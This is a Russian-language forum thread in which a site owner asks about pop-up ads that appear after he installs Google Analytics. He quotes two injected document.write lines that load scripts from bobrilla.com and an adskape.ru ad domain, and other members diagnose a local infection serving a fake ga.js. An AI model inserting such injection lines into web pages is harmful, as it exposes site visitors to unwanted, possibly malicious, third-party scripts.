Помощь
Страницы: 1 2 След.
Помощь, Непонятная реклама на сайте после google-analytics
Помогите разобратся. Поставил на сайт скрип google-analytics, поначалу все нормально, ничего странного. Потом сайт открываю - сначала в IE, потом в сафари и опере, начала выскакивать реклама (всплывающие окна), а в мазиле вроде нет. Вот я и хотел бы узнать, это нормально или есть способ убрать эту рекламу?
PS. скрипт отключил, реклама исчезла - но ведь и скрипта теперь нет
Проверьте скрипт и правильность его вставки, GA не показывает не какую рекламу.
Вот код, специально на опере не закрываю рекламу. вставляю появляется, убираю исчезает и как проверить
<script type="text/javascript">

var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-XXXXXX']);
  _gaq.push(['_trackPageview']);

(function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
И если не ошибаюсь, то вот именно вот эти строки, которые js коде стоят (google-analytics.com/ga.js) и генерируют рекламу -

document.write('<script language="javascript" type="text/javascript" src="bobrilla.com/60gzd6bhv6h7jxbsxyb8ycwdzg8zyvp"></script>');

document.write('<script type="text/javascript" src="p112476.adskape.ru/adout.js?p=112476&t=3"></script>');
Цитата
denkon пишет:
Помогите разобратся. Поставил на сайт скрип google-analytics, поначалу все нормально, ничего странного. Потом сайт открываю - сначала в IE, потом в сафари и опере, начала выскакивать реклама (всплывающие окна), а в мазиле вроде нет. Вот я и хотел бы узнать, это нормально или есть способ убрать эту рекламу?
PS. скрипт отключил, реклама исчезла - но ведь и скрипта теперь нет
Ребят, что никто не сталкивался?
Цитата
denkon пишет:
document.write('<script language="javascript" type="text/javascript" src="bobrilla.com/60gzd6bhv6h7jxbsxyb8ycwdzg8zyvp"></script>');

document.write('<script type="text/javascript" src="p112476.adskape.ru/adout.js?p=112476&t=3"></script>');
Уберите это и всё. Это не имеет к ГА никакого отношения. Другой вопрос, как к Вам это попало. Ведь если затесалось один раз - значит где-то дырка имеется - и нет гарантии, что таким же способом не попадет туда же снова оно или другое подобное....
Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.
Я имею ввиду уберите код ГА и проверьте, будет ли в исходнике опять появляться... Код ГА Вы показываете стандартный и правильный, возможно, совсем не в этом дело.
Цитата
Позитивный ЧЕЛовек пишет:
Цитата
denkon пишет:

Уберите это и всё. Это не имеет к ГА никакого отношения. Другой вопрос, как к Вам это попало. Ведь если затесалось один раз - значит где-то дырка имеется - и нет гарантии, что таким же способом не попадет туда же снова оно или другое подобное....
Интересно, но как  это сделать. Эти строки я что-ли придумал, это скрипт google, (google-analytics.com/ga.js) а не мой. Был бы мой, я убрал бы эти стороки сразу.
Цитата
denkon пишет:
google-analytics.com/ga.js
а код стандартный
провертесь на вирусы: 
 adskape.ru-  ADSkape — интеллектуальная медийная реклама
Описание: Интеллектуальная медийная реклама (цитата с анализа супра) и в коде ГА его быть не может
Цитата
sergs пишет:
А вы перейдите по адресу google-analytics.com/ga.js
и увидите в конце скрипта вот эти строки:

А что это? если не реклама?
Цитата
sergs пишет:
провертесь на вирусы:
adskape.ru- ADSkape — интеллектуальная медийная реклама
Описание: Интеллектуальная медийная реклама (цитата с анализа супра) и в коде ГА его быть не может
А ведь это скрипт googla, это им тогда надо на вирус проверять, а не мне.
Цитата
denkon пишет:
А вы перейдите по адресу google-analytics.com/ga.js
и увидите в конце скрипта вот эти строки:
перешел по адресу google-analytics.com/ga.js  и НЕ увидел таких строк
Цитата
sergs пишет:
я перешел стоит, ниче не понимаю
11.04.png (67.34 КБ) [ Скачать ]
почитайте здесь  forum.avast.com/index.php?topic=93641.0 может ваш случай тут правда на английском, если вкратце, то вирус на вашем компе перенаправляет вас на другой сайт и этот сайт выдает поддельный ГА
Страницы: 1 2 След.